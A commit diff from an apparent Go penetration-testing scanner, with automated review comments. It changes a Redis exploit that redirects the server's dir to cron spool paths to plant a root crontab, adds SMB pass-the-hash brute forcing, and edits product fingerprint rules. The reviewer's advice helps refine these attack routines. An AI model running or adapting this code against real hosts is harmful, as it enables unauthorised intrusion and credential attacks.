shadow1ng 2024-08-29 09:50:32 +08:00
parent e433c635dd
commit 513bb93e1b
3 changed files with 97 additions and 48 deletions


@ -118,6 +118,9 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
} }
func Expoilt(realhost string, conn net.Conn) error { func Expoilt(realhost string, conn net.Conn) error {
if common.Noredistest {
return nil
}
flagSsh, flagCron, err := testwrite(conn) flagSsh, flagCron, err := testwrite(conn)
if err != nil { if err != nil {
return err return err
@ -221,26 +224,26 @@ func writekey(conn net.Conn, filename string) (flag bool, text string, err error
func writecron(conn net.Conn, host string) (flag bool, text string, err error) { func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
flag = false flag = false
// 尝试写入Ubuntu的路径 // 尝试写入Ubuntu的路径
_, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/crontabs/\r\n")) _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/crontabs/\r\n"))
if err != nil {
return flag, text, err
}
text, err = readreply(conn)
if err != nil { if err != nil {
return flag, text, err return flag, text, err
} }
if !strings.Contains(text, "OK") { text, err = readreply(conn)
if err != nil {
return flag, text, err
}
if !strings.Contains(text, "OK") {
// 如果没有返回"OK"可能是CentOS尝试CentOS的路径 // 如果没有返回"OK"可能是CentOS尝试CentOS的路径
_, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/\r\n")) _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/\r\n"))
if err != nil { if err != nil {
return flag, text, err return flag, text, err
} }
text, err = readreply(conn) text, err = readreply(conn)
if err != nil { if err != nil {
return flag, text, err return flag, text, err
} }
} }
if strings.Contains(text, "OK") { if strings.Contains(text, "OK") {
_, err = conn.Write([]byte("CONFIG SET dbfilename root\r\n")) _, err = conn.Write([]byte("CONFIG SET dbfilename root\r\n"))
if err != nil { if err != nil {
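Review bot: The early returns added at L24/L28/L32 leave the target's running `dir` pointed at `/var/spool/cron/crontabs/` once the Ubuntu `CONFIG SET` at L22 has succeeded, and nothing in this hunk puts it back; unless a cleanup runs after the hunk (writecron's body continues past L47, so I cannot see it), read the original value with `CONFIG GET dir` before the first write and restore it on every early return, not only on the success path. The new `common.Noredistest` guard in `Expoilt` (L12-L14) returns nil silently, so the scan output cannot distinguish "exploitation skipped by flag" from a failed attempt; a comment such as `// -noredistest: stop after confirming unauthenticated access, never touch dir/dbfilename` plus one log line would make that explicit. The `strings.Contains(text, "OK")` tests at L34 and L45 accept any reply containing those two letters; if `readreply` returns the raw RESP line, `strings.HasPrefix(text, "+OK")` is the exact check.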


@ -17,51 +17,97 @@ func SmbScan2(info *common.HostInfo) (tmperr error) {
} }
hasprint := false hasprint := false
starttime := time.Now().Unix() starttime := time.Now().Unix()
hash := common.HashBytes if len(common.HashBytes) > 0 {
for _, user := range common.Userdict["smb"] { for _, user := range common.Userdict["smb"] {
PASS: for _, hash := range common.HashBytes {
for _, pass := range common.Passwords { pass := ""
pass = strings.Replace(pass, "{user}", user, -1) flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint) if flag2 {
if flag2 { hasprint = true
hasprint = true
}
if flag == true {
var result string
if common.Domain != "" {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
} else {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
} }
if len(hash) > 0 { if flag == true {
result += "hash: " + common.Hash var result string
if common.Domain != "" {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
} else {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
}
if len(hash) > 0 {
result += "hash: " + common.Hash
} else {
result += pass
}
common.LogSuccess(result)
return err
} else { } else {
result += pass var errlog string
if len(common.Hash) > 0 {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
} else {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
}
errlog = strings.Replace(errlog, "\n", " ", -1)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.HashBytes)) * common.Timeout) {
return err
}
} }
common.LogSuccess(result)
return err
} else {
var errlog string
if len(common.Hash) > 0 { if len(common.Hash) > 0 {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err) break
} else {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
}
errlog = strings.Replace(errlog, "\n", " ", -1)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
return err
} }
} }
if len(common.Hash) > 0 { }
break PASS } else {
for _, user := range common.Userdict["smb"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
hash := []byte{}
flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
if flag2 {
hasprint = true
}
if flag == true {
var result string
if common.Domain != "" {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
} else {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
}
if len(hash) > 0 {
result += "hash: " + common.Hash
} else {
result += pass
}
common.LogSuccess(result)
return err
} else {
var errlog string
if len(common.Hash) > 0 {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
} else {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
}
errlog = strings.Replace(errlog, "\n", " ", -1)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
if len(common.Hash) > 0 {
break
}
} }
} }
} }
return tmperr return tmperr
} }
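Review bot: In the new hash branch the success line at L78-L79 and the failure line at L87-L90 report `common.Hash` (or an empty `pass`) instead of the `hash` actually tried, so with several entries in `HashBytes` the log cannot say which one authenticated; use the loop variable, e.g. `result += fmt.Sprintf("hash: %x", hash)` and `errlog = fmt.Sprintf("[-] smb2 %v:%v %v %x %v", info.Host, 445, user, hash, err)`. The `if len(common.Hash) > 0 { break }` at L106-L107 sits inside `for _, hash := range common.HashBytes`, so whenever `-hash` is set it stops after the first hash for every user; if `HashBytes` is derived from `common.Hash` (as the names suggest) that is harmless for a single hash but silently skips the rest of a hash list, and it deserves either a comment stating that intent or removal, since the loop already ranges over `HashBytes`. The two branches otherwise duplicate roughly forty lines of result/error formatting and timeout bookkeeping; a helper taking `(user, pass, hash, err)` would leave one place to fix. Note that `SmbScan2`'s signature is above the hunk.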


@ -17,7 +17,7 @@ type PocData struct {
} }
var RuleDatas = []RuleData{ var RuleDatas = []RuleData{
{"宝塔", "body", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs)"}, {"宝塔", "code", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs)"},
{"深信服防火墙类产品", "code", "(SANGFOR FW)"}, {"深信服防火墙类产品", "code", "(SANGFOR FW)"},
{"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"}, {"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"},
{"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"}, {"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"},
@ -55,7 +55,7 @@ var RuleDatas = []RuleData{
{"Yundun", "headers", "(YUNDUN)"}, {"Yundun", "headers", "(YUNDUN)"},
{"Yunsuo", "headers", "(yunsuo)"}, {"Yunsuo", "headers", "(yunsuo)"},
{"Coding pages", "header", "(Coding Pages)"}, {"Coding pages", "header", "(Coding Pages)"},
{"启明防火墙", "body", "(/cgi-bin/webui?op=get_product_model)"}, {"启明防火墙", "code", "(/cgi-bin/webui?op=get_product_model)"},
{"Shiro", "headers", "(=deleteMe|rememberMe=)"}, {"Shiro", "headers", "(=deleteMe|rememberMe=)"},
{"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"}, {"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
{"Gogs简易Git服务", "cookie", "(i_like_gogs)"}, {"Gogs简易Git服务", "cookie", "(i_like_gogs)"},
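Review bot: The `启明防火墙` rule at L184 still cannot match its intended text: if the third field is compiled as a regular expression (the `(a|b)` alternations on every rule suggest it is), `webui?op=` means an optional `i` followed by `op=`, so the literal `webui?op=get_product_model` in a response body never matches; escape it as `{"启明防火墙", "code", "(/cgi-bin/webui\\?op=get_product_model)"}` (the unescaped `.` in `app.bt.cn/static/app.png` at L176 is the same issue in milder form). The commit changes `body` to `code` on two rules, which suggests `body` was not a recognised matcher key; `Coding pages` at L183 still uses the singular `header` while every neighbour uses `headers`, so it is worth confirming the matcher accepts both or correcting it to `headers` in the same pass. A one-line comment above `RuleDatas` naming the accepted matcher keys (`code`, `headers`, `cookie`, …) would prevent the next such slip.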